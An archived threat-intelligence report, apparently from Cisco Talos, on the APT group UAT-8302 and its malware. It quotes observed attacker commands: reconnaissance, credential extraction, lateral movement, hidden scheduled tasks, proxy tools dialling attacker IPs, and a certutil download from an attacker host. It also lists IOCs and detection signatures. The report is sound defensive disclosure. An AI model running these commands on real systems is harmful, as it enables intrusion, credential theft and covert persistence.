{
	"id": "474967b4-4232-436d-addf-73d1859e6473",
	"created_at": "2026-05-07T02:43:38.252551Z",
	"updated_at": "2026-05-07T02:44:10.914002Z",
	"deleted_at": null,
	"sha1_hash": "9c822f6005a986f77601350ad62f5a72645582b6",
	"title": "UAT-8302 and its box full of malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 734359,
	"plain_text": "UAT-8302 and its box full of malware\r\nBy Jungsoo An\r\nPublished: 2026-05-05 · Archived: 2026-05-07 02:00:20 UTC\r\nTuesday, May 5, 2026 06:00\r\nCisco Talos is disclosing UAT-8302, a sophisticated, China-nexus advanced persistent threat (APT) group\r\ntargeting government entities in South America since at least late 2024 and government agencies in\r\nsoutheastern Europe in 2025.\r\nAfter successful compromises, UAT-8302 deploys multiple custom-made malware families that have\r\npreviously been used by other known China-nexus threat actors.\r\nTalos discovered a .NET-based backdoor we track as “NetDraft” that is a C#-based variant of the\r\nFinalDraft/SquidDoor malware family developed and operated by Jewelbug/REF7707/CL-STA-0049/LongNosedGoblin, a cluster of China-nexus APT actors.\r\nFurthermore, UAT-8302 also uses an updated version of the CloudSorcerer backdoor, a malware family\r\nused in attacks against Russian government entities in 2024.\r\nUAT-8302 also used VSHELL and its SNOWLIGHT stager in their operations, along with a new Rust-based stager that we track as SNOWRUST.\r\nTalos assesses with high confidence that UAT-8302 is a China-nexus advanced persistent threat (APT) group\r\ntasked primarily with obtaining and maintaining long-term access to government and related entities around the\r\nworld.\r\nPost-compromise activity consisted of information collection, credential extraction, and proliferation using open-source tooling such as Impacket, proxying tools, and custom-built malware.\r\nhttps://blog.talosintelligence.com/uat-8302/\r\nPage 1 of 14\n\nMalware deployed by UAT-8302 connects it to several previously publicly disclosed threat clusters, indicating a\r\nclose operating relationship between them at the very least. Overall, the various malicious artifacts deployed by\r\nUAT-8302 indicate that the group has access to tools used by other sophisticated APT actors, all of which have\r\nbeen assessed as China-nexus or Chinese-speaking by various third-party industry reports.\r\nFor instance, NetDraft, a .NET-based malware family deployed by UAT-8302 in South America, was also\r\ndisclosed by ESET as NosyDoor, attributed to a China-nexus APT they track as LongNosedGoblin. ESET assesses\r\nthat LongNosedGoblin used NosyDoor/NetDraft and other custom-made malware to target government\r\norganizations in Southeast Asia and Japan. Furthermore, as per Solar’s reporting, NetDraft was also deployed\r\nagainst Russian IT organizations in 2024 by Erudite Mogwai (LuckyStrike Agent).\r\nNetDraft is likely a .NET-ported variant of the FinalDraft/SquidDoor malware family developed and operated\r\nexclusively by Jewelbug/REF7707/CL-STA-0049 — also another cluster of China-nexus APT actors.\r\nAnother malware family deployed by UAT-8302 is CloudSorcerer (version 3). Kaspersky disclosed that\r\nCloudSorcerer was used in attacks directed against Russian government entities in 2024.\r\nFurthermore, two other malware families, SNAPPYBEE/DeedRAT and ZingDoor, were deployed by UAT-8302 in\r\nconjunction with each other, a tactic also highlighted by Trend Micro in 2024.\r\nTalos’ analysis also connects more custom-made tooling that UAT-8302 used to other China-nexus or Chinese-speaking APTs:\r\nDraculoader: A generic shellcode loader deployed by UAT-8302, also used by the Earth Estries and Earth\r\nNaga APT groups who have histories of targeting government agencies in Southeast Asia and elsewhere.\r\nSNOWLIGHT: A generic stager for the VSHELL malware family, used by UAT-8302. Also used by UAT-6382, who exploited a Cityworks zero-day (CVE-2025-0994) to deploy VSHELL. SNOWLIGHT has also\r\nbeen seen in intrusions attributed to other China-nexus APT clusters, such as UNC5174 and UNC6586.\r\nThe various connections between UAT-8302 and other China-nexus or Chinese-speaking threat actors can be\r\nvisualized as:\r\nhttps://blog.talosintelligence.com/uat-8302/\r\nPage 2 of 14\n\nFigure 1. UAT-8302's interconnections.\r\nInitial compromise and reconnaissance\r\nUAT-8302's tooling overlaps with various APT groups that have been known to exploit both zero-day and n-day\r\nexploits to obtain initial access. We assess that UAT-8302 follows the same paradigm of obtaining initial access to\r\nits victims.\r\nOnce initial access is obtained, UAT-8302 conducts preliminary reconnaissance using red-teaming tools such as\r\nImpacket:\r\nOther reconnaissance commands may be:\r\nipconfig /all\r\ncertutil -user -store My\r\nhttps://blog.talosintelligence.com/uat-8302/\r\nPage 3 of 14\n\ncertutil -user -store CA\r\ncertutil -user -store Root\r\nwhoami\r\nnslookup www[.]google[.]com\r\nnet use\r\ncmd.exe /c net view /domain\r\ncmd.exe /c systeminfo\r\ncmd.exe /c net time /domain\r\ncmd.exe /c nslookup -type=SRV _ldap._tcp\r\nnet group \u003cname\u003e /domain\r\n One of UAT-8302's primary goals is to proliferate within the compromised network, and therefore, the actor\r\nconducts extensive reconnaissance on every endpoint that they can access. This extended recon is scripted usually\r\nusing a custom-made PowerShell script such as “whatpc.ps1”:\r\npowershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\\Windows\\Temp\\whatpc.ps1\r\nThe script may be persisted to collect system information via a scheduled task:\r\ncmd.exe /c schtasks /create /tn 'ReconLiteDebug' /tr 'powershell -ExecutionPolicy Bypass -WindowStyle\r\ncmd.exe /c schtasks /create /tn 'RunWhatPC' /tr 'c:\\windows\\temp\\run.bat' /sc ONCE /st 23:28 /ru SYST\r\nThis script executes the following commands on the systems to identify them:\r\nwhoami\r\nwhoami.exe /groups\r\nwhoami.exe /priv\r\nnet.exe user\r\nnet.exe localgroup\r\nnet.exe localgroup administrators\r\nipconfig.exe /all\r\nARP.EXE -a\r\nROUTE.EXE print\r\nNETSTAT.EXE -ano\r\ncmd.exe /c net share\r\ncmd.exe /c wmic startup get caption,command 2\u003e\u00261\r\nnltest.exe /dclist:\u003cdomain\u003e\r\nnet.exe user /domain\r\nnet.exe group /domain\r\nnet.exe group Domain Admins /domain\r\nnltest.exe /domain_trusts\r\nUAT-8302 also performs ping sweeps of the network to discover more endpoints to proliferate into:\r\nhttps://blog.talosintelligence.com/uat-8302/\r\nPage 4 of 14\n\nC:/Windows/Temp/ping_scan.bat\r\nC:/Windows/Temp/run_scan.bat\r\nC:/Windows/Temp/nbtscan.exe\r\ncmd.exe /Q /c (for /l %i in (1,1,254) do @ping -n 1 -w 300 192.168.1.%i | find TTL= \u0026\u0026 echo 192.168.1\r\nUAT-8302 also discovers SMB shares in the network to find reachable remote shares:\r\ncmd.exe /Q /c (for /l %i in (1,1,254) do @net use \\\\192.168.1.%i\\IPC$ \u003enul 2\u003e\u00261 \u0026\u0026 echo 192.168.1.%i\r\nScanning tools\r\nUAT-8302 may also download and run “gogo,” a GoLang based, open-sourced automated network scanning\r\nengine written in Simplified Chinese:\r\ncurl -fsSL hxxps://github[.]com/chainreactors/gogo/releases/download/v2.14.0/gogo_windows_amd64.exe -\r\nAdditionally, UAT-8302 uses a variety of scanning tools such as QScan, naabu and dddd  PortQry and httpx to\r\ndiscover services in the network:\r\nhttpx.exe -sc -title -location -f -td -r 192.168.1.1/16\r\nhttpx.exe -sc -title -location -td -r 192.168.1.1/16 -o web.txt\r\nhttpx.exe -sc -title -location -td -u 192.168.1.1/16 -o web.txt\r\nInformation collection\r\nUAT-8302 collects a variety of information about the environment that they are operating within including Active\r\nDirectory (AD) information and credentials using open-sourced tooling such as:\r\nadconnectdump.py\r\nA Python-based tool for Azure AD Connect/Entra ID connect credential extraction:\r\npython.exe adconnectdump.py\r\nUAT-8302 may also directly query the AD user and computer objects to obtain information from them via\r\nPowerShell:\r\npowershell -command Get-ADUser -Filter * -Property * | Select-Object Name, Displayname, LastLogonDate\r\npowershell -command Get-ADUser -Filter * -Property * | Select-Object SamAccountName, DisplayName, Ena\r\nhttps://blog.talosintelligence.com/uat-8302/\r\nPage 5 of 14\n\npowershell -Command Get-ADComputer -Filter * -Property Name,DNSHostName,OperatingSystem,Description\r\npowershell -Command Get-ADGroup -Filter * -Properties Members, Description | Select-Object Name, Desc\r\nSpecific AD users of interest may also be queried using system tools such as dsmod and dsquery.\r\nLog collection\r\nUAT-8302 also collects event log information and the logs themselves on multiple endpoints. Logs are an\r\nexcellent source of obtaining information and understanding security configurations and policies applied within a\r\ntarget’s environment:\r\npowershell -Command Get-WinEvent -ListLog Security | Format-List LogName, FileSize, LogMode, MaximumS\r\npowershell -command Get-EventLog -LogName System -Source NETLOGON -Newest 5000 | Where-Object { $_.Me\r\npowershell -Command chcp 437 \u003e$null; Get-WinEvent -FilterHashtable @{ LogName = 'Security'; ID = 4768\r\nAudit policies are also queried extensively to obtain system logging configurations:\r\nauditpol /get /category:Logon/Logoff\r\nauditpol /get /category:*\r\nUAT-8302 also collects AD snapshots using tools such as the AD Explorer tool:\r\nae.exe -snapshot c:\\windows\\temp\\result.dat /accepteula\r\ncmd.exe /C 7zr.exe a -mx=5 c:\\windows\\temp\\r.7z c:\\windows\\temp\\result.dat\r\nUAT-8302 also uses a tool written in Simplified Chinese called “SharpGetUserLoginIPRP” — derived from\r\nanother Chinese-language repository — which is used to extract login information from a domain controller:\r\nC:\\ProgramData\\S.exe user:pass@IP -day\r\nProliferation through the network\r\nUAT-8302 proliferates across various endpoints by using a combination of either Impacket- or WMI-based remote\r\nprocess creation:\r\ncmd.exe /C wmic /node:IP process call create cmd.exe /c c:\\programdata\\e1.bat\r\ncmd.exe /C schtasks /S IP /U username /P passwd /create /tn 'Runbat' /tr 'c:\\windows\\temp\\run.bat' /s\r\nhttps://blog.talosintelligence.com/uat-8302/\r\nPage 6 of 14\n\nThese BAT files are meant to execute the accompanying malware on the target systems.\r\nFurthermore, UAT-8302 may also extract login credentials from MobaxXterm, a multi-functional and tabbed SSH\r\nclient, using tools such as MobaXtermDecryptor to pivot to other endpoints.\r\nCustom-made malware deployment\r\nUAT-8302 deploys a variety of malware families in their intrusions including NetDraft, CloudSorcerer version 3,\r\nand VSHELL.\r\nNetDraft\r\nNetDraft, also known as  NosyDoor, is a .NET variant of the FINALDRAFT malware. FINALDRAFT or\r\nSquidoor is a malware family developed and operated exclusively by Jewelbug/REF7707/CL-STA-0049, a cluster\r\nof China-nexus APT actors. FINALDRAFT uses legitimate services such as MS Graph to act as command-and-control servers (C2s) to execute commands and payloads on the compromised system. Similarly, NetDraft relies\r\non the MS Graph API to communicate with its OneDrive based C2. NetDraft is deployed using the following\r\nmechanism:\r\nA benign executable is used to side load a malicious dynamic-link library (DLL) based loader.\r\nThe loader DLL decodes NetDraft from an accompanying data file and invokes it in the context of the\r\nexisting process.\r\nNetDraft also contains an embedded, .NET-based helper library. The library is compressed and embedded\r\nusing the Fody/Costura framework. During runtime, the library is decompressed and instrumented to carry\r\nout operations on the endpoint on behalf of NetDraft. We track this library as “FringePorch.”\r\nhttps://blog.talosintelligence.com/uat-8302/\r\nPage 7 of 14\n\nFigure 2. NetDraft and FringePorch infection chain.\r\nNetDraft and FringePorch support the following functionalities:\r\nExecute arbitrary commands on the endpoint\r\nExecute a .NET based assembly sent by the C2 within NetDraft’s process context\r\nExit and stop execution\r\nUpload files to C2\r\nDownload files from specified remote locations to local disks\r\nFile management: Change current working directory, rename files, enumerate files, and set write times\r\nSleep\r\nExecute a .NET plugin: This functionality is similar to its ability to run arbitrary .NET based assemblies.\r\nHere, the implant runs a provided plugin’s “Plugin.Run” function.\r\nSince NetDraft is missing the capability to persist across reboots and relogins, one of the first commands the C2\r\nissues to it is the creation of a malicious scheduled task:\r\nschtasks /create /ru system /tn Microsoft\\Windows\\Maps\\{a086ff1e-d6dc-45f7-b3e4-6udknw82sa} /sc hourl\r\nhttps://blog.talosintelligence.com/uat-8302/\r\nPage 8 of 14\n\nCloudSorcerer v3\r\nAnother malware UAT-8302 deploys is the latest version of the CloudSorcerer backdoor (version 3).  The malware\r\nconsists of the side-loading triad of files: a benign executable, a malicious DLL-based loader, and the actual\r\nimplant in a data file:\r\nYandex.exe -r -p:test.ini -s:12\r\nVMtools.exe -r -p:VM.ini -s:12\r\nThe executables will sideload a DLL named “mspdb60[.]dll”, which will load and decrypt the “.ini” file specified\r\nin the command line — such as “test.ini” or “vm.ini”. The decrypted shellcode is then injected into a combination\r\nof specified benign processes.\r\nCloudSorcerer v3 – The decrypted shellcode\r\nThe decrypted INI file is a newer version of CloudSorcerer (v3) disclosed by Kaspersky in 2024. Depending on\r\nprocess name (where it may have been initiated or injected), CloudSorcerer v3 will perform one of the following\r\nactions:\r\nIf the process is named “dpapimig.exe”, then it will gather system information, inject itself into\r\nexplorer.exe, and receive command codes from the C2 via a named pipe, gather disk information,\r\nenumerate files, execute arbitrary commands, perform file operations (delete, rename, read, write, etc.) and\r\nexecute shellcode received via the named pipe.\r\nIf the process is named “spoolsv.exe”, then it will contact GitHub to obtain C2 information and receive\r\ncommands from the C2.\r\nIf the process is named “mspaint.exe”, “browser”, or anything else, it will proceed to inject itself into\r\ndpapimg.exe, spoolsv.exe, etc. to kick off its malicious operations.\r\nThe system information CloudSorcerer v3 collects includes computer name, username and local system time.\r\nObtaining C2 information\r\nLike CloudSorcerer v2, version 3 contacts a legitimate service to obtain the C2 information. The malware will\r\neither contact a specific GitHub repository to read a data blob, or read a GameSpot profile the threat actors set up.\r\nThe data blob is decoded to obtain the C2 information, which can exist in the one of the following formats\r\ndepending on the variant of the CloudSorcerer backdoor:\r\nA C2 URL for a domain or IP, controlled by UAT-8302, that the malware uses to begin communication\r\nwith the C2 to carry out malicious operations\r\nAn access token to a legitimate service (such as OneDrive or Dropbox) that UAT-8302 uses to act as its C2\r\ninfrastructure to obtain next-stage payloads and commands\r\nVSHELL, SNOWLIGHT and SNOWRUST\r\nhttps://blog.talosintelligence.com/uat-8302/\r\nPage 9 of 14\n\nIn other instances, UAT-8302 deploys the VSHELL malware via a slightly different triad of artifacts for side-loading malware. The benign executable side-loads a malicious DLL named “wininet[.]dll” that reads a BIN file\r\nand injects it into “explorer[.]exe”.\r\nThe payload is position-independent shellcode that is injected into explorer[.]exe. The payload is a stager for the\r\nVSHELL malware that downloads and single-byte XORs the obtained payload with the key 0x99. The decoded\r\npayload is a garbled version of VSHELL.\r\nIt is worth noting that Talos observed the same single byte key and stager being used by UAT-6382 to deliver\r\nVSHELL malware in early 2025. Further investigation revealed that this stager is in fact SNOWLIGHT, a\r\nlightweight downloader that can download and deploy a next stage payload. UNC5174 has been observed using\r\nSNOWLIGHT to download Sliver and VSHELL. UNC5174 is a suspected China-nexus threat actor that typically\r\nexploits zero-day and n-day vulnerabilities to gain access to critical infrastructure organizations in the Americas.\r\nTalos discovered that UAT-8302 also used a Rust based variant of SNOWLIGHT that we track as “SNOWRUST.”\r\nSNOWRUST is based on the LexiCrypt Rust-based shellcode obfuscator. SNOWRUST simply decodes the\r\nembedded SNOWLIGHT shellcode and executes it to download the XOR encoded final payload, VSHELL,\r\nreceived from the C2.\r\nIn one intrusion, UAT-8302 used VSHELL to deploy a native driver from the Hades HIDS/HIPS software — an\r\nopen-source Windows host monitoring kernel framework written in Simplified Chinese. The driver was\r\nspecifically the System Monitoring filter driver that lets Hades register callbacks for process, thread, registry, and\r\nfile events. This allows the driver to monitor the system and potentially allow, block, or hide events and artifacts.\r\nThe SNAPPYBEE/DeedRAT and ZingDoor combo\r\nIn one instance, UAT-8302 first deployed a RAT family known as DeedRAT/SNAPPYBEE. However, UAT-8302\r\nalmost immediately switched over to a DLL-based malware family known as ZingDoor, first disclosed by Trend\r\nMicro in 2023, which has attributed both DeedRAT and ZingDoor to the China-nexus threat actor Earth Estries.\r\nZingDoor has also been deployed after the successful exploitation of ToolShell in 2025 by China-nexus threat\r\nactors.\r\nIn parallel, UAT-8302 also deployed Draculoader, a generic shellcode loader, also used by the Earth Estries and\r\nEarth Naga APT groups who have histories of targeting government agencies in Southeast Asia and elsewhere:\r\nC:\\Documents and Settings\\All Users\\Microsoft\\Crypto\\RSA\\d3d8.dll\r\nSetting up additional means of backdoor access\r\nOnce UAT-8302 deploys their custom-made malware, they begin establishing other means of backdoor access.\r\nOne of the techniques used is setting up proxy servers on infected systems to tunnel traffic outside the enterprise\r\nto the infected hosts using tools such as Stowaway (another tool written in Simplified Chinese):\r\nhttps://blog.talosintelligence.com/uat-8302/\r\nPage 10 of 14\n\nc:\\windows\\system32\\wagent.exe -c 85[.]209[.]156[.]3:56456\r\n \r\ncmd.exe /c (echo @echo off \u0026\u0026 start c:\\windows\\temp\\mmc.exe -l 85[.]209[.]156[.]3:56456 -s \u003cpass\u003e \u0026\u0026\r\n \r\nag531.exe -c 45[.]135[.]135[.]100:443 -s \u003cblah\u003e -f AgreedUponByAllParties\r\nUAT-8302 may use other tools such as anyproxy to set up proxies within the infected enterprise’s network:\r\nc:\\users\\public\\any.exe\r\nFurthermore, we observed UAT-8302 deploying the SoftEther VPN clients as well:\r\ncertutil -urlcache -split -f hxxp://38[.]54[.]32[.]244/Rar.exe rar.exe\r\n \r\nrar.exe x glb.rar\r\n \r\nCommunicator.exe /usermode\r\nCoverage\r\nThe following ClamAV signatures detect and block this threat:\r\nWin.Loader.CloudSorcerer-10059633-0\r\nWin.Loader.CloudSorcerer-10059634-0\r\nWin.Malware.CloudSorcerer-10059635-0\r\nWin.Tool.dddd-10059636-2\r\nWin.Tool.dddd-10059637-0\r\nWin.Loader.Donut-10059638-0\r\nWin.Loader.Draculoader-10059639-0\r\nWin.Tool.gogo-10059640-0\r\nWin.Tool.gogo-10059641-0\r\nPs1.Tool.Microburst-10059642-0\r\nWin.Tool.Mobaxtermdecryptor-10059643-0\r\nWin.Malware.Netdraft-10059644-0\r\nWin.Malware.Netdraft-10059645-0\r\nWin.Malware.Netdraft-10059646-0\r\nWin.Malware.Netdraft-10059647-0\r\nWin.Malware.Snappybee-10059648-0\r\nWin.Malware.Snappybee-10059649-0\r\nWin.Malware.Snappybee-10059650-0\r\nWin.Malware.Snappybee-10059651-0\r\nWin.Malware.Snappybee-10059652-0\r\nhttps://blog.talosintelligence.com/uat-8302/\r\nPage 11 of 14\n\nWin.Malware.Snappybee-10059653-0\r\nWin.Malware.Snowrust-10059654-0\r\nWin.Malware.Agent-10059655-0\r\nWin.Malware.Stowaway-10059656-0\r\nWin.Malware.Stowaway-10059657-0\r\nWin.Loader.Agent-10059658-0\r\nWin.Malware.Agent-10059659-0\r\nWin.Malware.Agent-10059660-0\r\nWin.Loader.Agent-10059661-1\r\nWin.Malware.Agent-10059662-0\r\nThe following Snort Rules (SIDs) detect and block this threat:\r\n66055, 66054, 301437, 301436, 301435, 301434, 301433, 301432, 301431\r\n66052, 66053, 66050, 66051, 66048, 66049, 66046, 66047, 66044, 66045, 66042, 66043, 66040, 66041\r\nIndicators of compromise (IOCs)\r\nIOCs for this threat are also available on our GitHub repository here.\r\nNetDraft, FringePorch\r\n1139b39d3cc151ddd3d574617cf113608127850197e9695fef0b6d78df82d6ca\r\nEe56c49f42522637f401d15ac2a2b6f3423bfb2d5d37d071f0172ce9dc688d4b\r\n51f0cf80a56f322892eed3b9f5ecae45f1431323600edbaea5cd1f28b437f6f2\r\n VSHELL\r\n35b2a5260b21ddb145486771ec2b1e4dc1f5b7f2275309e139e4abc1da0c614b\r\n199bd156c81b2ef4fb259467a20eacaa9d861eeb2002f1570727c2f9ff1d5dab\r\n ZingDoor\r\n071e662fc5bc0e54bcfd49493467062570d0307dc46f0fb51a68239d281427c6\r\n Gogo\r\nE74098b17d5d95e0014cf9c7f41f2a4e4be8baefc2b0eb42d39ae05a95b08ea5\r\n2b627f6afe1364a7d0d832ccba87ef33a8a39f30a70a5f395e2a3cb0e2161cb3\r\n Stowaway\r\nhttps://blog.talosintelligence.com/uat-8302/\r\nPage 12 of 14\n\n7c593ca40725765a0747cc3100b43a29b88ad1708ef77e915ab02686c0153001\r\nF859a67ceebc52f0770a222b85a5002195089ee442eac4bea761c29be994e2ea\r\n anyproxy\r\n7d9c70fc36143eb33583c30430dcb40cf9d306067594cc30ffd113063acd6292\r\n  QScan\r\n1bb59491f7289b94ab0130d7065d74d2459a802a7550ebf8cd0828f0a09c4d38\r\n Draculoader\r\n843f8aea7842126e906cadbad8d81fa456c184fb5372c6946978a4fe115edb1c\r\n Dddd\r\n343105919aa6df8a75ecb8b06b74f23a7d3e221fca56c67b728c50ea141314bc\r\n Httpx\r\n4109f15056414f25140c7027092953264944664480dd53f086acb8e07d9fccab\r\n SoftEther VPN\r\n3dec6703b2cbc6157eb67e80061d27f9190c8301c9dd60eb0be1e8b096482d7e\r\n SharpGetUserLogin\r\n9f115e9b32111e4dc29343a2671ab10a2b38448657b24107766dc14ce528fceb\r\nB19bfca2fc3fdabf0d0551c2e66be895e49f92aedac56654b1b0f51ec66e7404\r\n Naabu\r\n45cd169bf9cd7298d972425ad0d4e98512f29de4560a155101ab7427e4f4123f\r\n PortQry\r\nFb6cebadd49d202c8c7b5cdd641bd16aac8258429e8face365a94bd32e253b00\r\nhttps://blog.talosintelligence.com/uat-8302/\r\nPage 13 of 14\n\nNetwork IOCs\r\nhxxps[://]www[.]drivelivelime[.]com\r\nhxxps[://]www[.]drivelivelime[.]com/x\r\nhxxps[://]www[.]drivelivelime[.]com/pw\r\nwww[.]drivelivelime[.]com\r\nhxxps[://]msiidentity[.]com\r\nhxxps[://]msiidentity[.]com/pw\r\nmsiidentity[.]com\r\nhxxp[://]trafficmanagerupdate[.]com/index[.]php\r\ntrafficmanagerupdate[.]com\r\nimage[.]update-kaspersky[.]workers[.]dev\r\nupdate-kaspersky[.]workers[.]dev\r\n85[.]209[.]156[.]3\r\n85[.]209[.]156[.]3:56456\r\n85[.]209[.]156[.]3:46389\r\nhxxp[://]85[.]209[.]156[.]3:8080/wagent[.]exe\r\nhxxp[://]85[.]209[.]156[.]3:8082/wagent[.]exe\r\n185[.]238[.]189[.]41\r\nhxxp[://]185[.]238[.]189[.]41:8080\r\n103[.]27[.]108[.]55\r\nhxxp[://]103[.]27[.]108[.]55:48265/\r\nhxxp[://]38[.]54[.]32[.]244/Rar[.]exe\r\n38[.]54[.]32[.]244\r\n45[.]140[.]168[.]62\r\n88[.]151[.]195[.]133\r\n156[.]238[.]224[.]82\r\n45[.]135[.]135[.]100\r\nSource: https://blog.talosintelligence.com/uat-8302/\r\nhttps://blog.talosintelligence.com/uat-8302/\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/uat-8302/"
	],
	"report_names": [
		"uat-8302"
	],
	"threat_actors": [],
	"ts_created_at": 1778121818,
	"ts_updated_at": 1778121850,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9c822f6005a986f77601350ad62f5a72645582b6.pdf",
		"text": "https://archive.orkl.eu/9c822f6005a986f77601350ad62f5a72645582b6.txt",
		"img": "https://archive.orkl.eu/9c822f6005a986f77601350ad62f5a72645582b6.jpg"
	}
}